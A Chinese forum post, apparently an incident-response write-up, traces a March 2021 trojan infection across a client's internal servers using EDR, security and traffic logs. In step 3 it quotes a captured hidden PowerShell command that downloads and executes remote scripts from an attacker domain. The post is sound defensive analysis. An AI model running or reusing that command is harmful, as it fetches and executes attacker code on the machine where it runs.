一:项目背景
2021-3-19,客户反映内网服务器中木马,事情从服务器不能提供服务开始,随即发现多台服务器内存在木马病毒 二:客户诉求 中木马的时间以及中毒途径 三:溯源过程 1、从发现的第一台服务器(IP为222)着手开始调查,病毒已被杀毒软件隔离,查看病毒路径,首先查看文件夹写入时间(时间为此文件夹最后一次写的时间,文件夹内也没有别的文件)时间为3-16-11:11,基本可以确定中毒时间为3月16日11:11。 2、服务器安装了EDR软件,为什么没有作为,查看EDR的日志,吓一跳,病毒在运行时已被EDR检测,还被信任了,此时必有蹊跷,如果我没有记错的话,EDR文件实时防护检测的病毒可以忽略、隔离、信任,啥都不点应该是未处置。由此我推断这个操作是由远程桌面进行操作的,运行木马时点击信任。 3、查看浏览器以及下载软件是否有下载记录(答案是无),查看EDR的无文件攻击日志,巧妙的发现了执行了一些命令。具体看不懂,但是可以确定的是访问sec.xiaoshabi.nl了,猜测病毒是由这个网站传播。 powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/netstat.ps1')}" 4、whois一波,额并没有任何有用的信息,站长工具查询此域名也没有任何信息,只有一个A记录,而且IP是香港IP。 5、截止到目前未发现木马做了什么,一般面上看不出啥东西的木马,一定在后台隐藏着什么,知道了程序名查看下进程 ,tasklist -v |find “msdtc” 然后根据查到的PID反查网络连接,程序去连接了一个IP地址.且状态为ESTABLISHED,IP可使用baidu查询,结果是个德国的IP,理论上讲客户并没有此类业务,该机器的状态很有可能被控制。
6、知道了病毒下载途径以及病毒连接的地址,去行为管理查日志,查询日志为3-16开始访问sec.xiaoshabi.nl的ip。查到了10+台,最早访问的IP是168,有些严重,先把网站封了再说,使用自定义URL和端口控制封堵对其访问,。 7、现在分析远程桌面,还是查日志,查远程桌面登录日志,筛选中毒前时间的登录日志,筛选结果为空。查看安全日志,发现中毒前有审核成功的日志,发现流程为222<20<168,168是最早下载木马的机器,与AC日志吻合,再查168的日志,远程桌面日志也没有,登录审核日志也没有了,截止到现在已经无路可查了。 8、168机器还发现有趣的问题,EDR不知被何人在2021年1月13日设置了全盘信任,相关日志也没有。有可能是被故意删除了。其次发现一计划任务,每隔5分钟会执行一次powershell,本次的访问的域名为pastebin.com,解析地址为么美国,确认无相关此业务。 9、查找相关计划任务,直接删除。
溯源到此结束,有可能有分析不对的地方,见谅,知识库储备中。。。 | 
楼主
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
发表于 2021-3-22 10:00
技术员2级 
